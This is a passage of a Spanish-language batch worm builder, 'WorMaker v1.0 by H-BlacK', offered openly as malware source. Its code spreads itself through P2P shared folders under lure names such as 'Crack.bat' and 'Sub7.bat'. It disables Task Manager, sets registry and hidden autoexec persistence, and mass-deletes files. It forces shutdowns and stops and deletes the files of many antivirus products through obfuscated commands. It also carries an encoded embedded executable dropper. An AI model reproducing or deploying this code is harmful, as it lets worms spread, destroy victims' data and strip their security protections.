Goto Cont14 %a%:limon %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Crack.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Manual.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Msn.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Troyano en .txt interavtivo.bat %a%copy /Y %%0 %%programfiles%%\LimeWire\Shared\Sub7.bat %a%:Cont14 %a%if exist "%%programfiles%%\Overnet\incoming\" (Goto over) else Goto Cont15 %a%:over %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Crack.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Manual.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Msn.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Troyano en .txt interavtivo.bat %a%copy /Y %%0 %%programfiles%%\Overnet\incoming\Sub7.bat %a%:Cont15 %a%if exist "%%programfiles%%\Swaptor\Download\" (Goto swap) else Goto Cont16 %a%:swap

Page 41: Varios Bat

%a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Crack.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Manual.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Msn.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Troyano en .txt interavtivo.bat %a%copy /Y %%0 %%programfiles%%\Swaptor\Download\Sub7.bat %a%:Cont16 %a%if exist "%%programfiles%%\WinMX\My Shared Folder\" (Goto winmx) else Goto Cont17 %a%:winmx %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Sub7.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Crack.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Manual.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Msn.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\WinMX\My Shared Folder\Troyano en .txt interavtivo.bat %a%:Cont17 %a%if exist "%%programfiles%%\Tesla\Files\" Goto (telsa) else Goto Cont18 %a%:telsa %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Sub7.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Crack.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Manual.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Msn.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\Tesla\Files\Troyano en .txt interavtivo.bat %a%:Cont18 %a%if exist "%%programfiles%%\XoloX\Downloads\" (Goto xolox) else Goto Cont19 %a%:xolox %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Sub7.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Crack.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Manual.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Msn.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\XoloX\Downloads\Troyano en .txt interavtivo.bat %a%:Cont19 %a%if exist "%%programfiles%%\Rapigator\Share\" (Goto rapiga) else Goto Cont20 %a%:rapiga %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Sub7.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Crack.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Manual.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Msn.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\No-IP DUC.bat%a%copy /Y %%0 %%programfiles%%\Rapigator\Share\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\Rapigator\Share\Troyano en .txt interavtivo.bat %a%:Cont20 %a%if exist "%%programfiles%%\KMD\My Shared Folder\" (Goto kmd) else Goto Cont21 %a%:kmd %a%:rapiga %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Visual Basic.bat

Page 42: Varios Bat

%a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Sub7.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Crack.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Manual.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Msn.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\KMD\My Shared Folder\Troyano en .txt interavtivo.bat %a%:Cont21 %a%if exist "%%programfiles%%\Direct Connect\Received Files\" (Goto directcon) else Goto 22 %a%:directcon %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Sub7.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Crack.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Manual.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Msn.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\Direct Connect\Received Files\Troyano en .txt interavtivo.bat %a%:Cont22GoTo:eof:infoClscolor 0e%a%ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»%a%º               WorMaker[H-BlacK]                  º%a%ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ%b%%a%WorMaker v1.0 by H-BlacK.%a%Basado en los c¢digos de 3sk0r8ut0 y mejorados%a%para un funcionamiento optimo en una nueva versi¢n.%a%%line%%a% Posibles Bugs:%a%%line%%a%Al igual que en 3sk0r8ut0 al utilizar la misma opcion varias veces%a%puedes causar que el Worm generado sea inestable.%a%Tambien la opcion 17 ^"Ejecutar oculto^" de ser utilizada%a%[a pesar de no ser un bug] cuando se oculta su propia ventana%a%es al momento de haber ejecutado todas las opciones que se%a%escribieron antes,asi que es mejor agregar esa funcion al%a%principio y no al final o antes o despues.%b%%a%Este programa para su funcionamiento optimo no es necesario%a%ser compilado.%b%pauseGoTo:eof:AdmTask%a%if not exist %%systemroot%%\system32\tasklist.exe GoTo NoEfTasklist%a%for /f %%%%i in ('tasklist') do if %%%%i EQU acs.exe goto jmpOutpostNod32%a%for /f %%%%i in ('tasklist') do if %%%%i EQU nord32krn.exe goto jmpOutpostNod32%a%:NoEfTasklist%a%Reg Add HKCU\Software\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t reg_dword /d ^"1^" /f%a%:jmpOutpostNod32GoTo:eof:MakeFiles%a%set MyVar=0%a%:RepeatToMakeFiles%a%set /a MyVar=%%MyVar%% + 1%a%If %%MyVar%%==1000 GoTo EndBucleFile%a%MD %%Homedrive%%\%%random%%%a%GoTo RepeatToMakeFiles%a%:EndBucleFileGoTo:eof:Msg%a%msg * %Mensaje%GoTo:Eof

Page 43: Varios Bat

:Reg%a%Copy /y %%0 %%systemroot%%\system32\cmd.bat%a%Reg Add ^"HKLM\Software\Microsoft\Windows\CurrentVersion^" /v %RegValue%  /d %%systemroot%%\system32\cmd.bat

GoTo:eof:DelF%a%del /q /f /s %VarDeleteFile%GoTo:eof:CopyHide%a%copy /y %%0 %%systemroot%%\system32\autoexec.bat ^& attrib +r +a +s +h %%systemroot%%\system32\autoexec.batGoTo:eof:Shut%a%shutdown -s -f -t %Time%GoTo:eof:Reiniciar%a%shutdown -r -f -t %Time%GoTo:eof:AVkill%a%set aa=abcdefghijklmnopqrstuvwxyz.\/-%a%set ab=aa:~4,1%a%call set ab=%%%%%%ab%%%%%%%a%set ac=aa:~3,1%a%call set ac=%%%%%%ac%%%%%%%a%set ad=aa:~11,1%a%call set ad=%%%%%%ad%%%%%%%a%set ae=aa:~19,1%a%call set ae=%%%%%%ae%%%%%%%a%set af=aa:~28,1%a%call set af=%%%%%%af%%%%%%%a%set ag=aa:~16,1%a%call set ag=%%%%%%ag%%%%%%%a%set ah=aa:~5,1%a%call set ah=%%%%%%ah%%%%%%%a%set aj=aa:~18,1%a%call set aj=%%%%%%aj%%%%%%%a%set ai=%%ac%%%%ab%%%%ad%% %%af%%%%ag%% %%af%%%%ah%% %%af%%%%aj%% %a%set ak=aa:~0,1%a%call set ak=%%%%%%ak%%%%%%%a%set al=aa:~17,1%a%call set al=%%%%%%al%%%%%%%a%set am=aa:~8,1%a%call set am=%%%%%%am%%%%%%%a%set an=aa:~1,1%a%call set an=%%%%%%an%%%%%%%a%set ap=aa:~29,1%a%call set ap=%%%%%%ap%%%%%%%a%set aq=aa:~7,1%a%call set aq=%%%%%%aq%%%%%%%a%set ao=%%ak%%%%ae%%%%ae%%%%al%%%%am%%%%an%% %%ap%%%%al%% %%ap%%%%ak%% %%ap%%%%aj%% %%ap%%%%aq%% %a%set as=aa:~10,1%a%call set as=%%%%%%as%%%%%%%a%set ar=%%ae%%%%aj%%%%as%%%%am%%%%ad%%%%ad%% %a%Net Stop ^"Centro de seguridad^"%a%Net Stop sharedaccess%a%Net Stop ^"AVG7 Update Service^"%a%Net Stop ^"AVG7 Alert Manager Server^"%a%Net Stop ^"AVG E-mail Scanner^"%a%Net Stop ^"AVG Anti-Spyware Guard^"%a%Net Stop ^"NOD32 Kernel Service^"%a%Net Stop ^"avast! Web Scanner^"%a%Net Stop ^"avast! Mail Scanner^"%a%Net Stop ^"avast! iAVS4 Control Service^"%a%Net Stop ^"avast! Antivirus^"%a%%%ar%%ccProxy%a%%%ar%%ccSetMgr%a%%%ar%%SNDSrvc%a%%%ar%%SPBBCSvc%a%%%ar%%ccEvtMgr%a%%%ar%%ccApp%a%%%ar%%NMAIN

Page 44: Varios Bat

%a%%%ar%%SBServ%a%%%ar%%NOPDB%a%cd %%ProgramFiles%%\Archivos comunes\Symantec\Shared%a%if errorlevel==1 goto 1%a%%%ao%%*.*%a%%%ai%%*.*%a%:1%a%%%ar%%symlcsvc%a%cd %%ProgramFiles%%\Archivos comunes\Symantec\SharedCCPD-LC%a%if errorlevel==1 goto 2%a%%%ao%%*.*%a%%%ai%%*.*%a%:2%a%%%ar%%navapsvc%a%%%ar%%ISSVC%a%cd %%ProgramFiles%%\Norton Internet Security%a%if errorlevel==1 goto 3%a%%%ao%%*.*%a%%%ai%%*.*%a%:3%a%%%ar%%navapsvc%a%%%ar%%NPFMntor%a%%%ar%%navapw32%a%%%ar%%SAVScan%a%cd %%ProgramFiles%%\Norton AntiVirus%a%if errorlevel==1 goto 4%a%%%ao%%*.*%a%%%ai%%*.*%a%:4%a%%%ar%%NPROTECT%a%cd %%ProgramFiles%%\Norton Utilities%a%if errorlevel==1 goto 5%a%%%ao%%*.*%a%%%ai%%*.*%a%:5%a%%%ar%%GBPoll %a%%%ar%%navapsvc%a%%%ar%%NPFMntor%a%%%ar%%NPROTECT%a%%%ar%%NOPDB%a%%%ar%%GBTray%a%%%ar%%NPFMntor%a%%%ar%%GhostTray%a%%%ar%%PQV2iSvc%a%cd %%ProgramFiles%%\Norton System\Works\Norton AntiVirus%a%%%ar%%no-spy%a%if errorlevel==1 goto 6%a%cd %%ProgramFiles%%\SinEspias%a%%%ao%%*.*%a%%%ai%%*.*%a%:6%a%%%ar%%spyaxe%a%%%ar%%spyaxe%a%cd %%ProgramFiles%%\SpyAxe%a%if errorlevel==1 goto 7%a%%%ai%%*.*%a%:7%a%%%ar%%SpywareStrike%a%%%ar%%SpywareStrike%a%cd %%ProgramFiles%%\SpywareStrike%a%if errorlevel==1 goto 8%a%%%ao%%*.*%a%%%ai%%*.*%a%:8%a%%%ar%%gcasDtServ%a%%%ar%%gcasServ%a%cd %%ProgramFiles%%\Microsoft AntiSpyware%a%if errorlevel==1 goto 9%a%%%ao%%*.*%a%%%ai%%*.*%a%:9%a%%%ar%%kavsvc

Page 45: Varios Bat

%a%%%ar%%kav%a%cd %%ProgramFiles%%\KASPERSKY LAB\KASPERSKY\ANTI-VIRUS PERSONAL%a%if errorlevel==1 goto 10%a%%%ao%%*.*%a%%%ai%%*.*%a%:10%a%%%ar%%VsStat%a%cd %%ProgramFiles%%\McAfee\McAfee VirusScan%a%if errorlevel==1 goto 11%a%%%ao%%*.*%a%%%ai%%*.*%a%:11%a%%%ar%%Pavsrv51%a%%%ar%%AVENGINE%a%%%ar%%apvxdwin%a%%%ar%%pavProxy%a%cd %%ProgramFiles%%\Panda Software\Panda Antivirus Titanium%a%if errorlevel==1 goto 12%a%%%ao%%*.*%a%%%ai%%*.*%a%:12%a%%%ar%%SynTPLpr%a%%%ar%%SynTPEnh%a%cd %%ProgramFiles%%\SynapticsSynTP%a%if errorlevel==1 goto 13%a%%%ao%%*.*%a%%%ai%%*.*%a%:13%a%%%ar%%FrameworkService%a%%%ar%%Mcshield%a%%%ar%%VsTskMgr%a%%%ar%%SHSTAT%a%cd %%ProgramFiles%%\Network Associates\VirusScan%a%if errorlevel==1 goto 14%a%%%ao%%*.*%a%%%ai%%*.*%a%:14%a%%%ar%%nod32krn%a%%%ar%%nod32kui%a%cd %%ProgramFiles%%\Eset%a%if errorlevel==1 goto 15%a%%%ao%%*.*%a%%%ai%%*.*%a%:15%a%%%ar%%AVGSERV9%a%%%ar%%AVGCC32%a%cd %%ProgramFiles%%\GRISOFT\AVG6%a%if errorlevel==1 goto 16%a%%%ao%%*.*%a%%%ai%%*.*%a%:16%a%%%ar%%AVGUARD%a%%%ar%%AVWUPSRV%a%%%ar%%AVGNT%a%%%ar%%AVSched32%a%cd %%ProgramFiles%%\AVPersonal%a%if errorlevel==1 goto 17%a%%%ao%%*.*%a%%%ai%%*.*%a%:17%a%%%ar%%ASHSERV%a%%%ar%%ASHWEBSV%a%%%ar%%ASHMAISV%a%cd %%ProgramFiles%%\ALWIL SOFTWARE\AVAST4%a%if errorlevel==1 goto 18%a%%%ao%%*.*%a%%%ai%%*.*%a%:18%a%%%ar%%avgcc%a%%%ar%%avgamsvr%a%%%ar%%avgupsvc%a%cd %%ProgramFiles%%\Grisoft

Page 46: Varios Bat

%a%if errorlevel==1 goto 19%a%%%ao%%*.*%a%%%ai%%*.*%a%:19%a%%%ar%%Pagent%a%%%ar%%pagentwd%a%%%ar%%pavsched%a%cd %%ProgramFiles%%\Panda Software\Panda Administrator\Pav_Agent%a%if errorlevel==1 goto 20%a%%%ao%%*.*%a%%%ai%%*.*%a%:20%a%%%ar%%bdoesrv%a%%%ar%%bdmcon%a%%%ar%%bdnagent%a%%%ar%%bdswitch%a%cd %%ProgramFiles%%\Softwin\BitDefender9%a%if errorlevel==1 goto 21%a%%%ao%%*.*%a%%%ai%%*.*%a%:21%a%%%ar%%avgamsvr%a%%%ar%%avgupsvc%a%cd %%ProgramFiles%%\AVG7%a%if errorlevel==1 goto 22%a%%%ao%%*.*%a%%%ai%%*.*%a%:22%a%%%ar%%zlclient%a%%%ar%%zonealarm%a%%%ar%%vsmon%a%cd %%ProgramFiles%%\Zone Labs\ZoneAlarm%a%if errorlevel==1 goto 23%a%%%ao%%*.*%a%%%ai%%*.*%a%:23%a%%%ar%%aswUpdSv%a%%%ar%%ashServ%a%%%ar%%ashWebSv%a%%%ar%%ashDisp%a%cd %%ProgramFiles%%\Alwil Software\Avast4%a%if errorlevel==1 goto 24%a%%%ao%%*.*%a%%%ai%%*.*%a%:24%a%%%ar%%avgamsvr%a%%%ar%%vgupsvc%a%%%ar%%avgcc%a%cd %%ProgramFiles%%\Grisoft\AVG free%a%if errorlevel==1 goto 25%a%%%ao%%*.*%a%%%ai%%*.*%a%:25GoTo:eof:Runhide%a%If exist Efects.exe GoTo AbajoEfct%a%%e%Hide^>^"Hide.com^" ^& Hide.com^>nul ^& del /q /f hide.com%a%GoTo AbajoEfct%a%:Hide%a%%a%XPPPYZIQD[L-f6-g41GDSXu'@,~P^^^^P_O,!(GU(GZ(Gnu5-NETSEND_V1.00_JRT=%a%%a%CFFFRX,`,`2$F=@!t.rQ0%%%%IuL0%%%%(%%%%(%%%%GERYAARX2%%%%(%%%%t8-EFECTS.EXE___01422%a%%a%1v1v0^^^<0xD^^^"1^^^<0$G^^^"P/0A0^^^^F^^^"12d^^^"1TP)0B0z0z1^^^^Q+0m1TQ-w^^^"1+1S1#0B0zd^^^"0]%a%%a%Q+0z0Y1_1o0Sh^^^"0u0XP*d^^^"0]P,0z0Y1_1uv^^^"P-q^^^"e^^^"e^^^"0S0.0^^^>1kP-0^^^&E^^^"001S1.%a%%a%0S130X1(K^^^"100(100(100(0T16v^^^"081/0$M^^^"070S050T0-v^^^"0/0C0T0^^^"v^^^"081/0$%a%%a%M^^^"070X17I^^^"0XQ+L^^^"0_N^^^"0S050T0-v^^^"0/0C0X1#L^^^"1S0#1#0F19P*D^^^"0^^^<Q/1F1C0^^^<%a%%a%1#D^^^"1C0i1^^^<0x1Y0^^^<P*D^^^"0p17!(c)[email protected]_XXXX^^^<%a%%a%s'Y9Pv-1D:PA(=I.@$Y9!!^^^&`?gk/neVx,AtyU^^^^6!.Tro=^^^&^^^"!K`hXN^^^"-4PTqI@7ZG%a%%a%Gkq1!'Ok4^^^"nZmHCwD\NV/'-4.foCPobxF(R[b9SaE'm68\=-,D^^^^Sjg2,4Hh=^^^".=-%a%%a%bFY?oh+ojpq9u5/(r_Bhx=!?OQ!N!'Ek%%%%9#\qk^^^"ifvsw^^^^cdQr{,;YW!,YC!mv7Yu

Page 47: Varios Bat

%a%%a%i-4Y)Ib'Q(_9ee)Jbb!'jNE')-'nNJ^^^&B$p)BFzvj=.HD'eEv]N?xj29F$x^^^"y:MBY%a%%a%ek8*j/E'*R(W:L+#Sm'@3h:^^^>!'!!!!,8!!,7yY!,N^^^"!!!!!!!)!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%%%%!!!!!YMZ#K$x'r:KdQ^^^<!Zc=a3R2Vp(Wj5w%a%%a%C8Z_RfaGr4r^^^^)\/GI7^^^^*NVaC^^^"NXhgBFiD^^^<[;3AOi7O!!!!!!!+$$!!.B^^^&`!^^^"zH\l%a%%a%!!!!!!!!!^^^"dP^^^"^^^>#v!A,D!)!!!!,8!!^^^"f^^^"^^^&#mvkN^^^"$p#+!'!$!!!^^^"!!!^^^"!!!!!1!!%a%%a%!A!!!!!!!!#k!!!!!!!!^^^".!Q!!,8!!!!!!!-!!!!!!,8!!N^^^"!!!!7O!^^^"!!!!!!!!%a%%a%^^^&Z!!!!!!!!!!!!!!dPBf1qN^^^"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!$e7{)I!!!!!^^^&!$!!!a!!!!!!!!!1!!%a%%a%!!!!!!!!!!!!!!^^^"F!!*o^^^>z0O^^^&Z!!!!!1!!!#dQN^^^"!A!!!!^^^&Z!!!!!!!!!!!!!!!!%a%%a%7O!$NL\-O+!!!!!!^^^&Z!!^^^"^^^&!Q!!^^^"F!!!3!!!!!!!!!!!!!!!!!)!!^^^"^^^&){plD0(NNz%a%%a%,YY]#ow8Y3jOZM?-c]Br!4P^^^<!!9%%%%N^^^"!G!!*qyXxcvMN2-7C/^^^"drZ^^^&]!(7n(u$09$%a%%a%^^^>VNd-^^^^AA5xz[yQP/^^^>^^^<h@:F/-^^^^nj.^^^"H!!DOr*?vt]n4%%%%W:fg_R!#(dV83uCr^^^^^^^&5Z]%a%%a%mXY5Sm5F\BErZ6Dc^^^>TrwvCNb#V^^^^Oz{{^^^"zhUq-Rrl:\$]C),DBQhS%%%%_f8?/]'N#bu%a%%a%u2dUZ'0{wy'9#Kx`Ar6[K0z{z9Pk#o,$#oHqIo9M=^^^>9c,:)IQ4[3(a`oyFtp0?]?%a%%a%Q9d0E+-^^^<h*1/o^^^&oTRW_^^^<^^^&X9P2pwQ-h(1%%%%Cj5bqMc@:rdUW]ZF\^^^&r0z^^^^Vn7;Yzf^^^<H%a%%a%In^^^&:f,\fQ3t!#U`1d;KK2$^^^"IEk$3pf)U1r+mu=EG=KExy6C7si/D]LUKtOKz8Yqx%a%%a%^^^"g^^^&B0S`\`^^^<KTx^^^"C+;nttOSOGPLx1og6b!CAmXUyc'SYt]`%%%%d=1O?3U;-j$,PQQL[%a%%a%6NO/!@LficLR//I[zz$p8__a',`oACs0Xa!qGIi,HZO!()=v^^^&k0cZIipo%%%%j6#;ok%a%%a%)V8re/Q\7)R#NJp^^^"3^^^<SwlvMY_(I/%%%%C;l^^^<GQQ]=DL7J9zA?o^^^^=eGI^^^"q!A[2S^^^<M@K^^^&%a%%a%J4x'ycpdn=x7(bU-qH56e)7757.^^^^+lAu4Dq0pPeT^^^&T*s4oc\oTNK5oe0l(sQz{\E%a%%a%DXySxIwRuMjKcRsbt-WUe0$fV*^^^>GV5_EHElY2[a7AHy')G;tEUS2[#^^^>#RuMWd8wg%a%%a%RVYjJdOax+t[^^^<s'g^^^<8KO#/OVvk?88K`{yhdQZlOeSd(9887c+6gL!*ekie#\NBru%a%%a%^^^&\.x3^^^^u+0K^^^&^^^"?qmy9YPq!V!^^^>t.wR=H7\YEIm2jW8;m;CJw,icKLryGRx9ikP@epI%a%%a%FR$ZmcKHNC#bw^^^&4!.4fd=IZ/'nS-wO[^^^^9sD^^^<89c#,3;BM,K4^^^"5YZB^^^&=:(46.%%%%f)Y%a%%a%)yOCKHd'v(Z3y1F17`5#Dnu:[\O{WXgDMzM`vDA7)TIS8Yk_%%%%WhwOH0E^^^&jcc^^^<up\%a%%a%.x[W+%%%%#76DKt!CcZEau^^^^m+9jlDxjX:T[Blg`pq(I#;gk/:+^^^<OI3x@PG[4mI,*P:J%a%%a%,1^^^&2^^^&]v.=o*^^^>O1^^^&q?;Oev2#O6^^^"=y$E6M2Sr//F^^^<(q75De^^^^FUUc*)^^^^Z*GxGe1#+%%%%q%a%%a%?d:F%%%%h7Mz5TDZO\-^^^&^^^<U1@kDhD+ty9QFS.=u4Mi^^^&`YErW-=`_%%%%H!j)Y6j:?4^^^&_Tv7%a%%a%Ds?#[!OO1{!@C_rjINC+mbQnNW$m2gt^^^&%%%%FbW_1a1S{i5O.Hr`Op3xzbee+*gtiN^^^"%a%%a%v^^^^Y^^^&`ITO9!7T#Rf'M;Qm9wZ^^^^j:I^^^&Jh1!1_(R+=p*F-tct_xS/.H'UM3C$`'A^^^<P2Q%a%%a%mj%%%%A;ZzM^^^"F$(O=[Pu`0y8+2T^^^&PUf;;G^^^&]\,Jw7+I[HIiqJr/T$R_S`pr[lP\n3zG%a%%a%FGak.LczU!ko^^^"R6crQh^^^&0T3k@[(ya%%%%'`C?nQCD3[hu!$)tWdIU*,#'4!)1^^^&VPR8h%a%%a%HIi9O.dcl^^^<S5)Qd9'M;v'1!uD^^^<RcO^^^"8\G,Q*)l-D#Krs5,$U9h!7N?yK)HL2^^^&C^^^"^^^<%a%%a%E]E6Y;Q!_qIYVjq9x`+i4^^^&q!yLggmSG(!Ze,1_-mM^^^>6X^^^^a@X8jjyt,agyi/3Yd]A%a%%a%2mEB*^^^<MtHL5FQwfwSxQlqr657WsJ$UbLG0V1=AEuw{)gs)'#f]y$R1*EA^^^&Dr.Q.m%a%%a%4$7k6hww=gj_*!/O%%%%LiH@a^^^^ri!-jmG57Dc?CHp:Nf\oDSP=tMwmm^^^^N;ZYwjVo:;p%a%%a%E2^^^<tbd^^^"7*7/:I)#37`dUY@qB:B+tJ.D49eoSabO`:D8ub)!^^^&/eMt+q'=+=cgs%%%%d!%a%%a%mbg#P(337MEuICwJo^^^"HD*u6vFR!l$$-`Yc%%%%NLBT64`gR=`P%%%%Rh=rru?\D_,K)j+/%a%%a%,;.fU+^^^&#Is!b4,V:Esnof+?^^^<g$tNaMsSM_Yj8P+2GVbg9wq6%%%%(^^^^sYA7qH.`N_X/@%a%%a%^^^"rv9#a$@5TSJdxU?3q^^^<pbJ8vl`q]Yp/^^^"/\HN(lD`q,tb33E-FvE^^^"EW$V8t_,]WpQ%a%%a%;O)m#Wd`$-gP!dB6NLmV:^^^"-mHFYiU$fa,sy[Kl^^^"sXdqke;iwL\Eu5%%%%pD)f,bqCTH%a%%a%^^^"Cp0M#CJdd7h^^^&aXu^^^&C3/7.ztdNgI7sn?UC*qG!46XLFJ15LVi7rKJT;Y^^^"tHEI1$0%a%%a%L^^^^9^^^&q[VjSZ!^^^"^^^"^^^<iSs[$C^^^^zL7By^^^"3f3HXEt^^^^rBsS\dtcGQ$!$,XQ)u^^^<04!A+O,:d[%a%%a%^^^&A2_^^^<zdQVcVjs$uKr7)PWp:^^^^NM1L@#NV6nZAWf!iT*1$Ces.Y!WGs,^^^"F/9FT!aWI%a%%a%m5^^^<YC^^^>T^^^"vP-I]\q#cms%%%%;cnr:u,8a,qq+#T$Sj^^^":IogwVndQ]5RT!?TJvn\^^^>ogbn%a%%a%@Dp(;.-DVeFAY=\?e?iudRC;3-d]^^^&ophwp^^^<l5]5^^^&V*e^^^^]N;GGkQFcxYYD@7`0w,B%a%%a%)m^^^&#Xx!7)Io{?^^^>a)IY^^^";OSah@^^^&VR^^^>mWT-YS[e^^^&F0^^^&KgoT68Tx71*-0?yUmWJgCiK%a%%a%#3^^^&_Q:q2=ZXpW)Cl^^^"*P%%%%3l_O7h,S@@S_.gd^^^<Nx:i4+TE%%%%F)V2X@^^^>m9^^^"ixaI;)Nfl%a%%a%?ahH1y!61CF$lpsp`J[ieY0O!x/hiq82YZEI[fXNE;'O)0BA=k9!0hVR!a^^^^_L)Rv%a%%a%q\M3uDx'c4s1BUvPQydJ^^^",#1E\_rMcmz'syjPYa@p1r